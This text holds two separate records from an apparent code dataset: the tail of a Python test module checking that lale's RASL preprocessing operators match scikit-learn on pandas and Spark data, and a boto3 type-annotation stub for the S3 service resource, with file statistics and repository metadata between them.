list(sk_trained.data_range_), list(rasl_trained.impl.data_range_)
)
self.assertEqual(list(sk_trained.scale_), list(rasl_trained.impl.scale_))
self.assertEqual(list(sk_trained.min_), list(rasl_trained.impl.min_))
self.assertEqual(sk_trained.n_features_in_, rasl_trained.impl.n_features_in_)
self.assertEqual(sk_trained.n_samples_seen_, rasl_trained.impl.n_samples_seen_)
def test_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
self._check_trained(sk_trained, rasl_trained)
def test_transform(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data_spark)
rasl_transformed = rasl_transformed.toPandas()
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
def test_fit_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
self._check_trained(sk_trained, rasl_trained)
def test_transform_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data_spark)
rasl_transformed = rasl_transformed.toPandas()
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
def test_partial_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data1 = data[:10]
data1_spark = lale.datasets.pandas2spark(data1)
data2 = data[10:100]
data2_spark = lale.datasets.pandas2spark(data2)
data3 = data[100:]
data3_spark = lale.datasets.pandas2spark(data3)
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.partial_fit(data1)
rasl_trained = rasl_scaler.partial_fit(data1_spark)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data2)
rasl_trained = rasl_scaler.partial_fit(data2_spark)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data3)
rasl_trained = rasl_scaler.partial_fit(data3_spark)
self._check_trained(sk_trained, rasl_trained)
class TestPipeline(unittest.TestCase):
def setUp(self):
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
X, y = load_iris(as_frame=True, return_X_y=True)
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y)
self.X_train_spark = lale.datasets.pandas2spark(self.X_train)
self.X_test_spark = lale.datasets.pandas2spark(self.X_test)
def test_pipeline_pandas(self):
pipeline = RaslMinMaxScaler() >> LogisticRegression()
trained = pipeline.fit(self.X_train, self.y_train)
_ = trained.predict(self.X_test)
def test_pipeline_spark(self):
pipeline = (
RaslMinMaxScaler()
>> FunctionTransformer(func=lambda X: X.toPandas())
>> LogisticRegression()
)
trained = pipeline.fit(self.X_train_spark, self.y_train)
_ = trained.predict(self.X_test_spark)
class TestOrdinalEncoder(unittest.TestCase):
@classmethod
def setUpClass(cls):
targets = ["pandas", "spark"]
cls.tgt2gosales = {tgt: fetch_go_sales_dataset(tgt) for tgt in targets}
cls.tgt2creditg = {
tgt: lale.datasets.openml.fetch(
"credit-g",
"classification",
preprocess=False,
astype=tgt,
)
for tgt in targets
}
def _check_trained(self, op1, op2, msg):
self.assertEqual(list(op1.feature_names_in_), list(op2.feature_names_in_), msg)
self.assertEqual(len(op1.categories_), len(op2.categories_), msg)
for i in range(len(op1.categories_)):
self.assertEqual(list(op1.categories_[i]), list(op2.categories_[i]), msg)
def _check_last_trained(self, op1, op2, msg):
last1 = op1.get_last().impl
last2 = op2.get_last().impl
assert last1 is not None
assert last2 is not None
self._check_trained(last1.impl, last2.impl, msg)
def test_fit(self):
prefix = Scan(table=it.go_daily_sales) >> Map(
columns={"retailer": it["Retailer code"], "method": it["Order method code"]}
)
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": np.nan}
rasl_trainable = prefix >> RaslOrdinalEncoder(**encoder_args)
sk_trainable = prefix >> SkOrdinalEncoder(**encoder_args)
sk_trained = sk_trainable.fit(self.tgt2gosales["pandas"])
for tgt, datasets in self.tgt2gosales.items():
rasl_trained = rasl_trainable.fit(datasets)
self._check_last_trained(sk_trained, rasl_trained, tgt)
def test_partial_fit(self):
prefix = Scan(table=it.go_daily_sales) >> Map(
columns={"retailer": it["Retailer code"], "method": it["Order method code"]}
)
pandas_data = prefix.transform(self.tgt2gosales["pandas"])
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": np.nan}
for tgt in self.tgt2gosales.keys():
rasl_op = RaslOrdinalEncoder(**encoder_args)
for lower, upper in [[0, 10], [10, 100], [100, pandas_data.shape[0]]]:
data_so_far = pandas_data[0:upper]
sk_op = SkOrdinalEncoder(**encoder_args).fit(data_so_far)
data_delta = pandas_data[lower:upper]
if tgt == "spark":
data_delta = lale.datasets.pandas2spark(data_delta)
rasl_op = rasl_op.partial_fit(data_delta)
self._check_trained(
sk_op, rasl_op.impl, f"tgt {tgt}, lower {lower}, upper {upper}"
)
def test_transform(self):
prefix = Scan(table=it.go_daily_sales) >> Map(
columns={"retailer": it["Retailer code"], "method": it["Order method code"]}
)
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": np.nan}
rasl_trainable = prefix >> RaslOrdinalEncoder(**encoder_args)
sk_trainable = prefix >> SkOrdinalEncoder(**encoder_args)
sk_trained = sk_trainable.fit(self.tgt2gosales["pandas"])
sk_transformed = sk_trained.transform(self.tgt2gosales["pandas"])
for tgt, datasets in self.tgt2gosales.items():
rasl_trained = rasl_trainable.fit(datasets)
self._check_last_trained(sk_trained, rasl_trained, tgt)
rasl_transformed = rasl_trained.transform(datasets)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_predict(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": -1}
sk_trainable = prefix >> SkOrdinalEncoder(**encoder_args) >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = prefix >> RaslOrdinalEncoder(**encoder_args) >> to_pd >> lr
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
class TestOneHotEncoder(unittest.TestCase):
@classmethod
def setUpClass(cls):
import typing
from typing import Any, Dict
targets = ["pandas", "spark"]
cls.tgt2creditg = typing.cast(
Dict[str, Any],
{
tgt: lale.datasets.openml.fetch(
"credit-g",
"classification",
preprocess=False,
astype=tgt,
)
for tgt in targets
},
)
def _check_trained(self, op1, op2, msg):
self.assertEqual(list(op1.feature_names_in_), list(op2.feature_names_in_), msg)
self.assertEqual(len(op1.categories_), len(op2.categories_), msg)
for i in range(len(op1.categories_)):
self.assertEqual(list(op1.categories_[i]), list(op2.categories_[i]), msg)
def _check_last_trained(self, op1, op2, msg):
last1 = op1.get_last().impl
last2 = op2.get_last().impl
assert last1 is not None
assert last2 is not None
self._check_trained(last1.impl, last2.impl, msg)
def test_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
rasl_trainable = prefix >> RaslOneHotEncoder()
sk_trainable = prefix >> SkOneHotEncoder()
sk_trained = sk_trainable.fit(train_X_pd)
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_last_trained(sk_trained, rasl_trained, tgt)
def test_partial_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
for tgt in self.tgt2creditg.keys():
rasl_pipe = prefix >> RaslOneHotEncoder()
for lower, upper in [[0, 10], [10, 100], [100, train_X_pd.shape[0]]]:
data_so_far = train_X_pd[0:upper]
sk_pipe = prefix >> SkOrdinalEncoder()
sk_pipe = sk_pipe.fit(data_so_far)
data_delta = train_X_pd[lower:upper]
if tgt == "spark":
data_delta = lale.datasets.pandas2spark(data_delta)
rasl_pipe = rasl_pipe.partial_fit(data_delta)
self._check_last_trained(
sk_pipe,
rasl_pipe,
(tgt, lower, upper),
)
def test_transform(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
rasl_trainable = prefix >> RaslOneHotEncoder(sparse=False)
sk_trainable = prefix >> SkOneHotEncoder(sparse=False)
sk_trained = sk_trainable.fit(train_X_pd)
sk_transformed = sk_trained.transform(test_X_pd)
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_last_trained(sk_trained, rasl_trained, tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_predict(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
sk_trainable = prefix >> SkOneHotEncoder(sparse=False) >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = prefix >> RaslOneHotEncoder(sparse=False) >> to_pd >> lr
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
class TestSimpleImputer(unittest.TestCase):
@classmethod
def setUpClass(cls):
targets = ["pandas", "spark"]
cls.tgt2adult = {
tgt: lale.datasets.openml.fetch(
"adult",
"classification",
preprocess=False,
astype=tgt,
)
for tgt in targets
}
def _fill_missing_value(self, col_name, value, missing_value):
for tgt, datasets in self.tgt2adult.items():
(train_X, train_y), (test_X, test_y) = datasets
if tgt == "pandas":
train_X.loc[
train_X[col_name] == value, col_name
] = missing_value # type:ignore
test_X.loc[
test_X[col_name] == value, col_name
] = missing_value # type:ignore
elif tgt == "spark":
from pyspark.sql.functions import col, when
train_X = train_X.withColumn(
col_name,
when(col(col_name) == value, missing_value).otherwise(
col(col_name)
),
)
test_X = test_X.withColumn(
col_name,
when(col(col_name) == value, missing_value).otherwise(
col(col_name)
),
)
self.tgt2adult[tgt] = (train_X, train_y), (test_X, test_y)
def test_fit_transform_numeric_nan_missing(self):
self._fill_missing_value("age", 36.0, np.nan)
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
hyperparams = [
{"strategy": "mean"},
{"strategy": "median"},
{"strategy": "most_frequent"},
{"strategy": "constant", "fill_value": 99},
]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(**hyperparam)
sk_trainable = prefix >> SkSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_transformed = sk_trained.transform(self.tgt2adult["pandas"][1][0])
sk_statistics_ = sk_trained.steps[-1][1].impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.steps[-1][1].impl.statistics_
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_fit_transform_numeric_nonan_missing(self):
self._fill_missing_value("age", 36.0, -1)
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
hyperparams = [
{"strategy": "mean"},
{"strategy": "median"},
{"strategy": "most_frequent"},
{"strategy": "constant", "fill_value": 99},
]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(
missing_values=-1, **hyperparam
)
sk_trainable = prefix >> SkSimpleImputer(missing_values=-1, **hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_transformed = sk_trained.transform(self.tgt2adult["pandas"][1][0])
sk_statistics_ = sk_trained.get_last().impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.get_last().impl.statistics_ # type: ignore
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_predict(self):
self._fill_missing_value("age", 36.0, np.nan)
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2adult["pandas"]
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
imputer_args = {"strategy": "mean"}
sk_trainable = prefix >> SkSimpleImputer(**imputer_args) >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = prefix >> RaslSimpleImputer(**imputer_args) >> to_pd >> lr
for tgt, dataset in self.tgt2adult.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
def test_invalid_datatype_strategy(self):
sk_trainable = SkSimpleImputer()
with self.assertRaises(ValueError):
sk_trainable.fit(self.tgt2adult["pandas"][0][0])
rasl_trainable = RaslSimpleImputer()
for _, dataset in self.tgt2adult.items():
(train_X, _), (_, _) = dataset
with self.assertRaises(ValueError):
_ = rasl_trainable.fit(train_X)
def test_default_numeric_fill_value(self):
self._fill_missing_value("age", 36.0, np.nan)
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
hyperparams = [{"strategy": "constant"}]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(**hyperparam)
sk_trainable = prefix >> SkSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_transformed = sk_trained.transform(self.tgt2adult["pandas"][1][0])
sk_statistics_ = sk_trained.steps()[-1].impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.steps[-1][1].impl.statistics_
print(sk_statistics_, rasl_statistics_)
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_default_string_fill_value(self):
self._fill_missing_value("education", "Prof-school", np.nan)
str_columns = ["workclass", "education", "capital-gain"]
prefix = Map(columns={c: it[c] for c in str_columns})
hyperparams = [{"strategy": "constant"}]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(**hyperparam)
sk_trainable = prefix >> SkSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_statistics_ = sk_trained.steps()[-1].impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.steps[-1][1].impl.statistics_
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
# Note that for this test case, the output of sklearn transform does not
# match rasl transform. There is at least one row which has a None
# value and pandas replace treats it as nan and replaces it.
# Sklearn which uses numpy does not replace a None.
# So we just test that `missing_value` is the default assigned.
self.assertEqual(rasl_transformed.iloc[1, 1], "missing_value")
def test_multiple_modes_numeric(self):
# Sklearn SimpleImputer says: for strategy `most_frequent`,
# if there is more than one such value, only the smallest is returned.
data = [[1, 10], [2, 15], [3, 14], [4, 15], [5, 14], [6, np.nan]]
df = pd.DataFrame(data, columns=["Id", "Age"])
hyperparam = {"strategy": "most_frequent"}
sk_trainable = SkSimpleImputer(**hyperparam)
rasl_trainable = RaslSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(df)
rasl_trained = rasl_trainable.fit(df)
self.assertEqual(
len(sk_trained.statistics_), len(rasl_trained.impl.statistics_), "pandas"
)
self.assertEqual(
list(sk_trained.statistics_), list(rasl_trained.impl.statistics_), "pandas"
)
# Ideally, we should test this for spark too, but the order of multiple modes
# is different in spark and hence the statistics_ does not match.
# Both are correct as per the definition of mode.
@unittest.skip("skipping because the output does not match. Should we handle this?")
def test_multiple_modes_string(self):
# Sklearn SimpleImputer says: for strategy `most_frequent`,
# if there is more than one such value, only the smallest is returned.
data = [
["a", "t"],
["b", "f"],
["b", "m"],
["c", "f"],
["c", "m"],
["f", "missing"],
]
df = pd.DataFrame(data, columns=["Id", "Gender"])
hyperparam = {"strategy": "most_frequent", "missing_values": "missing"}
sk_trainable = SkSimpleImputer(**hyperparam)
rasl_trainable = RaslSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(df)
rasl_trained = rasl_trainable.fit(df)
self.assertEqual(
len(sk_trained.statistics_), len(rasl_trained.impl.statistics_), "pandas"
)
self.assertEqual(
list(sk_trained.statistics_), list(rasl_trained.impl.statistics_), "pandas"
)
# Ideally, we should test this for spark too, but the order of multiple modes
# is different in spark and hence the statistics_ does not match.
# Both are correct as per the definition of mode.
class TestStandardScaler(unittest.TestCase):
@classmethod
def setUpClass(cls):
import typing
from typing import Any, Dict
targets = ["pandas", "spark"]
cls.tgt2creditg = typing.cast(
Dict[str, Any],
{
tgt: lale.datasets.openml.fetch(
"credit-g",
"classification",
preprocess=True,
astype=tgt,
)
for tgt in targets
},
)
def _check_trained(self, op1, op2, msg):
self.assertEqual(list(op1.feature_names_in_), list(op2.feature_names_in_), msg)
self.assertEqual(op1.n_features_in_, op2.n_features_in_, msg)
self.assertEqual(op1.n_samples_seen_, op2.n_samples_seen_, msg)
if op1.mean_ is None:
self.assertIsNone(op2.mean_, msg)
else:
self.assertIsNotNone(op2.mean_, msg)
self.assertEqual(len(op1.mean_), len(op2.mean_), msg)
for i in range(len(op1.mean_)):
self.assertAlmostEqual(op1.mean_[i], op2.mean_[i], msg=msg)
if op1.var_ is None:
self.assertIsNone(op2.var_, msg)
else:
self.assertIsNotNone(op2.var_, msg)
self.assertEqual(len(op1.var_), len(op2.var_), msg)
for i in range(len(op1.var_)):
self.assertAlmostEqual(op1.var_[i], op2.var_[i], msg=msg)
if op1.scale_ is None:
self.assertIsNone(op2.scale_, msg)
else:
self.assertIsNotNone(op2.scale_, msg)
self.assertEqual(len(op1.scale_), len(op2.scale_), msg)
for i in range(len(op1.scale_)):
self.assertAlmostEqual(op1.scale_[i], op2.scale_[i], msg=msg)
def test_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
sk_trainable = SkStandardScaler()
sk_trained = sk_trainable.fit(train_X_pd)
rasl_trainable = RaslStandardScaler()
for tgt, dataset in self.tgt2creditg.items():
(train_X, _), (_, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_trained(sk_trained, rasl_trained.impl, tgt)
def test_partial_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
for tgt in self.tgt2creditg.keys():
rasl_op = RaslStandardScaler()
for lower, upper in [[0, 10], [10, 100], [100, train_X_pd.shape[0]]]:
data_so_far = train_X_pd[0:upper]
sk_op = SkStandardScaler()
sk_op = sk_op.fit(data_so_far)
data_delta = train_X_pd[lower:upper]
if tgt == "spark":
data_delta = lale.datasets.pandas2spark(data_delta)
rasl_op = rasl_op.partial_fit(data_delta)
self._check_trained(sk_op, rasl_op.impl, (tgt, lower, upper))
def test_transform(self):
(train_X_pd, _), (test_X_pd, _) = self.tgt2creditg["pandas"]
sk_trainable = SkStandardScaler()
sk_trained = sk_trainable.fit(train_X_pd)
sk_transformed = sk_trained.transform(test_X_pd)
rasl_trainable = RaslStandardScaler()
for tgt, dataset in self.tgt2creditg.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_trained(sk_trained, rasl_trained.impl, tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertAlmostEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
msg=(row_idx, col_idx, tgt),
)
def test_predict(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
sk_trainable = SkStandardScaler() >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = RaslStandardScaler() >> to_pd >> lr
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
| 47.578216 | 91 | 0.628324 | 4,877 | 41,060 | 5.019479 | 0.072996 | 0.038194 | 0.033374 | 0.051389 | 0.849592 | 0.814542 | 0.794444 | 0.780596 | 0.770874 | 0.757884 | 0 | 0.017035 | 0.265149 | 41,060 | 862 | 92 | 47.633411 | 0.794286 | 0.039406 | 0 | 0.706667 | 0 | 0 | 0.040781 | 0.001294 | 0 | 0 | 0 | 0 | 0.150667 | 1 | 0.065333 | false | 0 | 0.038667 | 0 | 0.113333 | 0.001333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
01480a8149460e4da2c4755a504272a5ca72cd15 | 23,246 | py | Python | boto3_type_annotations/boto3_type_annotations/s3/service_resource.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations/boto3_type_annotations/s3/service_resource.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations/boto3_type_annotations/s3/service_resource.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from boto3.s3.transfer import TransferConfig
from boto3.resources.collection import ResourceCollection
from typing import IO
from typing import Union
from typing import List
from typing import Optional
from botocore.client import BaseClient
from typing import Callable
from typing import Dict
from datetime import datetime
from boto3.resources import base
class ServiceResource(base.ServiceResource):
buckets: 'buckets'
def Bucket(self, name: str = None) -> 'Bucket':
pass
def BucketAcl(self, bucket_name: str = None) -> 'BucketAcl':
pass
def BucketCors(self, bucket_name: str = None) -> 'BucketCors':
pass
def BucketLifecycle(self, bucket_name: str = None) -> 'BucketLifecycle':
pass
def BucketLifecycleConfiguration(self, bucket_name: str = None) -> 'BucketLifecycleConfiguration':
pass
def BucketLogging(self, bucket_name: str = None) -> 'BucketLogging':
pass
def BucketNotification(self, bucket_name: str = None) -> 'BucketNotification':
pass
def BucketPolicy(self, bucket_name: str = None) -> 'BucketPolicy':
pass
def BucketRequestPayment(self, bucket_name: str = None) -> 'BucketRequestPayment':
pass
def BucketTagging(self, bucket_name: str = None) -> 'BucketTagging':
pass
def BucketVersioning(self, bucket_name: str = None) -> 'BucketVersioning':
pass
def BucketWebsite(self, bucket_name: str = None) -> 'BucketWebsite':
pass
def MultipartUpload(self, bucket_name: str = None, object_key: str = None, id: str = None) -> 'MultipartUpload':
pass
def MultipartUploadPart(self, bucket_name: str = None, object_key: str = None, multipart_upload_id: str = None, part_number: str = None) -> 'MultipartUploadPart':
pass
def Object(self, bucket_name: str = None, key: str = None) -> 'Object':
pass
def ObjectAcl(self, bucket_name: str = None, object_key: str = None) -> 'ObjectAcl':
pass
def ObjectSummary(self, bucket_name: str = None, key: str = None) -> 'ObjectSummary':
pass
